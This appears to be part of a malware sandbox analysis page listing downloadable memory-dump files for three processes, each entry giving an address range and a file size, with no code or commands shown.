memory/3180-154-0x00000000027C0000-0x00000000027E0000-memory.dmp

Filesize
128KB

Download
memory/3180-169-0x0000000013380000-0x00000000133A0000-memory.dmp

Filesize
128KB

Download
memory/3180-155-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-168-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-157-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-158-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-159-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-167-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/3180-163-0x00000000027E0000-0x0000000002800000-memory.dmp

Filesize
128KB

Download
memory/3648-50-0x000002971ED70000-0x000002971ED80000-memory.dmp

Filesize
64KB

Download
memory/3648-52-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/3648-49-0x000002971ED70000-0x000002971ED80000-memory.dmp

Filesize
64KB

Download
memory/3648-48-0x000002971ED70000-0x000002971ED80000-memory.dmp

Filesize
64KB

Download
memory/3648-47-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/3704-118-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/3704-132-0x00007FFC532F0000-0x00007FFC53DB1000-memory.dmp

Filesize
10.8MB

Download
memory/3704-129-0x00000182372E0000-0x00000182372F0000-memory.dmp

Filesize
64KB

Download
memory/3704-130-0x00000182372E0000-0x00000182372F0000-memory.dmp

Filesize
64KB

Download